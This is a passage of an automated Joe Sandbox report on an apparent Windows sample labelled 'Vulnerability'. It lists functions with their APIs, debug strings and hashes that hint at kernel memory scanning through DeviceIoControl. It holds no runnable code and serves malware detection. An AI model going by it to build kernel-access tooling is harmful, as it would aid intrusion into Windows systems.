Instruction Fuzzy Hash: 40516323628A4185EBA0AF19D490338E7A0FF94F95F598631CE5E53760CF3ED55A8320

Function 00007FF7738E7C70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 00007FF7738E7D33
memcmp.VCRUNTIME140 ref: 00007FF7738E7DB3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7DF5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7E8A

Strings

[-] Can't find section, xrefs: 00007FF7738E7DDF
[-] Can't read module headers, xrefs: 00007FF7738E7E74
0, xrefs: 00007FF7738E7CF1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememcmp
String ID: 0$[-] Can't find section$[-] Can't read module headers
API String ID: 3070867233-813957328
Opcode ID: ae88ce224be0fa513a1a237f5953d652758b14a64ca5b7594779ea4c29c95df2
Instruction ID: 2aea49dc5409a91b7283b02ab319149ea58eb2883e38d65807a1a52d5b6e0cd6
Opcode Fuzzy Hash: ae88ce224be0fa513a1a237f5953d652758b14a64ca5b7594779ea4c29c95df2
Instruction Fuzzy Hash: CE51B132A387C281DB609B15E4402BAE3A4FB85794F940335EA9C63798DF7DD451C730

Function 00007FF7738E7B00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D
memset.VCRUNTIME140 ref: 00007FF7738E7B7F

Part of subcall function 00007FF7738E5E00: DeviceIoControl.KERNEL32 ref: 00007FF7738E5E9B

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7C28

Strings

[-] Can't find pattern, xrefs: 00007FF7738E7C0B
[-] Read failed in FindPatternAtKernel, xrefs: 00007FF7738E7B9B
[-] Can't find pattern, Too big section, xrefs: 00007FF7738E7B63
[-] No module address to find pattern, xrefs: 00007FF7738E7B30

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememset
String ID: [-] Can't find pattern$[-] Can't find pattern, Too big section$[-] No module address to find pattern$[-] Read failed in FindPatternAtKernel
API String ID: 1687902784-521562947
Opcode ID: c4f6970c0d3319753cd87f31fc89c76cfe6ed10349820c40aa8ac09d30b6d1e7
Instruction ID: f55ef171249936f9e9fc68802b16229736838d7233df221f26ea76501d63aed6
Opcode Fuzzy Hash: c4f6970c0d3319753cd87f31fc89c76cfe6ed10349820c40aa8ac09d30b6d1e7
Instruction Fuzzy Hash: 9741D253E7869740FAD0BB12A8102B9E6A1AF95BD0FC44231ED5D27391DE3EE4658330

Function 00007FF7738F34F0 Relevance: 12.2, APIs: 8, Instructions: 160COMMON

Download Yara Rule

APIs

?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3529
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3551
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35B8
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35E1
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3601
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F364A
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3691
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F36D1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@$?sbumpc@?$basic_streambuf@
String ID:
API String ID: 2679766405-0
Opcode ID: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
Instruction ID: 5e738e499075b1a68cd044fd582e882a7d76280600c2d7028f53ec40decbe3c0
Opcode Fuzzy Hash: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
Instruction Fuzzy Hash: F251C32393C68381EAE26B25D500138E6909F75BA4F984230DEAD267D5DE7FE465D330

Function 00007FF7738F3080 Relevance: 12.1, APIs: 8, Instructions: 135COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7738F30C1
??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F30E0
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738F30FF
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F3133
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738F3152
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F319B
??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738F31D4

Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3529
Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3551
Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35B8
Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F364A

Part of subcall function 00007FF7738E9EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F50
Part of subcall function 00007FF7738E9EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F72

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F327A

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$?sgetc@?$basic_streambuf@$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@D@std@@@1@_V?$basic_streambuf@fclosememset
String ID:
API String ID: 777851723-0
Opcode ID: f6d979b06e38d0605af6dfecbce4140227a37eabd21b430ce7e6c2582f50442e
Instruction ID: 4c6be5811b0395d31a8687bf2f69f7cee312c5852105ac6f1fb722806c074dee
Opcode Fuzzy Hash: f6d979b06e38d0605af6dfecbce4140227a37eabd21b430ce7e6c2582f50442e
Instruction Fuzzy Hash: 1D616A33628B828ADB50DF64E4802AEF7B0FB95B48F444126EB8C53A58DF7ED515CB10

Function 00007FF7738EE8A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEA56
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEAB1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEB2F

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

Part of subcall function 00007FF7738E6440: VirtualAlloc.KERNEL32 ref: 00007FF7738E65FA
Part of subcall function 00007FF7738E6440: VirtualFree.KERNEL32 ref: 00007FF7738E662E

Strings

[-] Failed to resolve import , xrefs: 00007FF7738EE9E9
wasn't found, xrefs: 00007FF7738EEA98
[-] Dependency , xrefs: 00007FF7738EEA6C

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Virtual$V01@$Free$??6?$basic_ostream@AllocControlD@std@@@std@@DeviceInformationQuerySystemU?$char_traits@V01@@$_invalid_parameter_noinfo_noreturnmemset
String ID: wasn't found$[-] Dependency $[-] Failed to resolve import
API String ID: 2919487795-3042260135
Opcode ID: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
Instruction ID: a47f430937f6f1d69fd2cb4eb065573fcbda79c2bb0d72c70f4db7ffdef3da51
Opcode Fuzzy Hash: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
Instruction Fuzzy Hash: AE61AE63A79B4281EE94FB12E454179E3A1AB49BC0FC44636CE8D27755EF3EE0608330

Function 00007FF7738E90E0 Relevance: 10.7, APIs: 7, Instructions: 180COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738E9192

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
Instruction ID: 13870b66e733d775bf6e2e23fb08187bb51f689e373ca3694be539a4fa2b1bcf
Opcode Fuzzy Hash: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
Instruction Fuzzy Hash: 72817B23B28A4199EB509F75D4802ACB7B0FB48768F841236DE6D63B94DF7DD5A4C320

Function 00007FF7738ED050 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7738ED0E7
memmove.VCRUNTIME140 ref: 00007FF7738ED132
memmove.VCRUNTIME140 ref: 00007FF7738ED14A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED1E7
memmove.VCRUNTIME140 ref: 00007FF7738ED21C
memmove.VCRUNTIME140 ref: 00007FF7738ED23A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED25D

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
Instruction ID: cea8f0828191c17bcf65d09dfc1d82ca6831ebcfe0aa761b3eaf46bd97b61e37
Opcode Fuzzy Hash: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
Instruction Fuzzy Hash: B7518123A28B8195EA50BF25D50426CE3A0FB55B94F984735DE2C273C1DF7DE1A9C360

Function 00007FF7738EC7A0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EC8A7

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
Instruction ID: 21c7bb06e942e80aa1920c589ab05b8a7d0e514a491d4f8cd217467eb566da96
Opcode Fuzzy Hash: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
Instruction Fuzzy Hash: 76316E23A38B4281EA94AF11E540169F370FB98B94F880631EE9E57765DF3DE461C720

Function 00007FF7738EA2B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7738EA2DD
??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7738EA2F7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7738EA329
?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7738EA354
std::_Facet_Register.LIBCPMT ref: 00007FF7738EA36D
??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7738EA38C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EA3B7

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskD@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 3790006010-0
Opcode ID: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
Instruction ID: e5c4b5753025f88269cb5b930eb7d3b3f5272e1cd930732984eb1e46618481b4
Opcode Fuzzy Hash: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
Instruction Fuzzy Hash: 51314023638B4281EB94AF11E440169F360FB98F94F880631DE9D1B7A5DF3DE561C720

Function 00007FF7738ECAF0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7738ECB1D
??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7738ECB37
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7738ECB69
?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7738ECB94
std::_Facet_Register.LIBCPMT ref: 00007FF7738ECBAD
??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7738ECBCC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ECBF7

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@W@std@@std::_
String ID:
API String ID: 3972169111-0
Opcode ID: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
Instruction ID: 0892e01a2224c5f60edb91841eff1a0f947d731269c47ccc270fbba5ce6fa1a9
Opcode Fuzzy Hash: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
Instruction Fuzzy Hash: 28316F23A78B4281EA94AF15E440169F370FB98F94F880731EA9D277A4DF3DE560C720

Function 00007FF7738F2770 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7738F285F
memset.VCRUNTIME140 ref: 00007FF7738F286C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F28A5
memmove.VCRUNTIME140 ref: 00007FF7738F28AF
memset.VCRUNTIME140 ref: 00007FF7738F28BC
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F28F0

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2171940698-0
Opcode ID: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
Instruction ID: ac8ef51f39665ed0ff82fb7bc2caf856ce4ae5d1a430b98563e1811f6ec32e96
Opcode Fuzzy Hash: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
Instruction Fuzzy Hash: 99411466B38A8681EA50FB16D54426DE391FB58BD0F840635DE6D177C5DE3DE061C330

Function 00007FF7738ECEA0 Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECF94
memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFA2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFDB
memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFE5
memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFF3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED028

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 7774afede2dd2c65080f7186d4b5eb86b53875fec8a5485529166658e60ed2fb
Instruction ID: 4ec31d1348444ddb0ef650c6a6bfb4a8944d4e83f9835626999a94a8697b4c20
Opcode Fuzzy Hash: 7774afede2dd2c65080f7186d4b5eb86b53875fec8a5485529166658e60ed2fb
Instruction Fuzzy Hash: E441A263B79A4285EE60AB16A400369E361FB44FD0F984731DE9D1B789DE7DE0A18330

Function 00007FF7738ED760 Relevance: 9.1, APIs: 6, Instructions: 110COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7738ED84B
memmove.VCRUNTIME140 ref: 00007FF7738ED85A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED88E
memmove.VCRUNTIME140 ref: 00007FF7738ED895
memmove.VCRUNTIME140 ref: 00007FF7738ED8A4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED8CF

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 9b4c4663e2db16781191eb0651c26dc5f36e1b65ffecc715211cceebdcd9d5cd
Instruction ID: 502787d89479242c22f4548c83e684f1c721c952b0dd61fa6942d28d521d6542
Opcode Fuzzy Hash: 9b4c4663e2db16781191eb0651c26dc5f36e1b65ffecc715211cceebdcd9d5cd
Instruction Fuzzy Hash: 5A41D363B3965285EE54BB1294002ACE351AB04BD0FD84B32DE5D1B7D5DE3EE0A9C230

Function 00007FF7738E9FB0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7738E9FEA
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA007
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA030
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA07B

